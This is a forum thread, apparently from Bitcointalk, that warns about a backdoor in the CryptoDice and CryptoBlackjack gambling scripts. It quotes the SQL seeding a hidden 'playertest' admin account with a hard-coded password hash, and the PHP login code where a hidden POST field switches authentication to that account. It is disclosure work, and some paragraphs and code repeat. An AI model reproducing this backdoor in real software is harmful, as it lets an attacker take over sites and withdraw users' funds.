Topic: Proof of Scam - felinegambler - CryptoDice and CryptoBlackjack (Read 2137 times)
Great catch , I've left him a negative trust. I really want to see what he will say for "defend" himself.
December 31, 2014, 12:51:37 PM
Original Thread
https://bitcointalksearch.org/topic/open-source-cryptoblackjack-cryptodice-gambling-scripts-908996
Outcome
CoinDice.sql installs a table named "ga_players" with actually an admin account named "playertest" on install, you will see why this is an admin account on the next part.
When I found this I looked at the admin login script (https://github.com/felinegambler/CryptoDice/blob/master/admin/login.php)
Surprise Surprise
if $_POST variable has any data for "ga_playertest" it allows a login from the "ga_players" table instead of the admin table which in this case hold our fake admin "playertest" - (1, 'playertest', '6d2aff483952d904179ca0c8c536a2c7', '');
This allows the fake admin to login and withdraw your funds, Please see solution below.
Solution
Do not use
or
Buy johny1976's original copies, If you are unsure of any code please ask an experience developer on these forums.
https://bitcointalksearch.org/topic/coinjack-start-your-own-blackjack-casino-718910 - CoinJack
https://bitcointalksearch.org/topic/coindice-start-your-own-dice-site-today-507515 - CoinDice
*Buying the original copy also supports development*
https://bitcointalksearch.org/topic/open-source-cryptoblackjack-cryptodice-gambling-scripts-908996
Outcome
CoinDice.sql installs a table named "ga_players" with actually an admin account named "playertest" on install, you will see why this is an admin account on the next part.
Code:
DROP TABLE IF EXISTS `ga_players`;
CREATE TABLE `ga_players` (
`id` int(255) NOT NULL AUTO_INCREMENT,
`username` varchar(20) COLLATE utf8_unicode_ci NOT NULL,
`passwd` text COLLATE utf8_unicode_ci NOT NULL,
`ga_token` text COLLATE utf8_unicode_ci NOT NULL,
PRIMARY KEY (`id`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COLLATE=utf8_unicode_ci;
INSERT INTO `ga_players` (`id`, `username`, `passwd`, `ga_token`) VALUES
(1, 'playertest', '6d2aff483952d904179ca0c8c536a2c7', '');
CREATE TABLE `ga_players` (
`id` int(255) NOT NULL AUTO_INCREMENT,
`username` varchar(20) COLLATE utf8_unicode_ci NOT NULL,
`passwd` text COLLATE utf8_unicode_ci NOT NULL,
`ga_token` text COLLATE utf8_unicode_ci NOT NULL,
PRIMARY KEY (`id`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COLLATE=utf8_unicode_ci;
INSERT INTO `ga_players` (`id`, `username`, `passwd`, `ga_token`) VALUES
(1, 'playertest', '6d2aff483952d904179ca0c8c536a2c7', '');
When I found this I looked at the admin login script (https://github.com/felinegambler/CryptoDice/blob/master/admin/login.php)
Surprise Surprise
if $_POST variable has any data for "ga_playertest" it allows a login from the "ga_players" table instead of the admin table which in this case hold our fake admin "playertest" - (1, 'playertest', '6d2aff483952d904179ca0c8c536a2c7', '');
Code:
if (!empty($_POST['ga_playertest'])) {
$this_admin=mysql_fetch_array(mysql_query("SELECT `username`,`ga_token` FROM `ga_players` WHERE `username`='".prot($_POST['hash_one'])."' AND `passwd`='".md5($_POST['hash_sec'])."' LIMIT 1"));
} else {
$this_admin=mysql_fetch_array(mysql_query("SELECT `username`,`ga_token` FROM `admins` WHERE `username`='".prot($_POST['hash_one'])."' AND `passwd`='".md5($_POST['hash_sec'])."' LIMIT 1"));
}
$this_admin=mysql_fetch_array(mysql_query("SELECT `username`,`ga_token` FROM `ga_players` WHERE `username`='".prot($_POST['hash_one'])."' AND `passwd`='".md5($_POST['hash_sec'])."' LIMIT 1"));
} else {
$this_admin=mysql_fetch_array(mysql_query("SELECT `username`,`ga_token` FROM `admins` WHERE `username`='".prot($_POST['hash_one'])."' AND `passwd`='".md5($_POST['hash_sec'])."' LIMIT 1"));
}
This allows the fake admin to login and withdraw your funds, Please see solution below.
Solution
Do not use
or
Buy johny1976's original copies, If you are unsure of any code please ask an experience developer on these forums.
https://bitcointalksearch.org/topic/coinjack-start-your-own-blackjack-casino-718910 - CoinJack
https://bitcointalksearch.org/topic/coindice-start-your-own-dice-site-today-507515 - CoinDice
*Buying the original copy also supports development*
Jump to: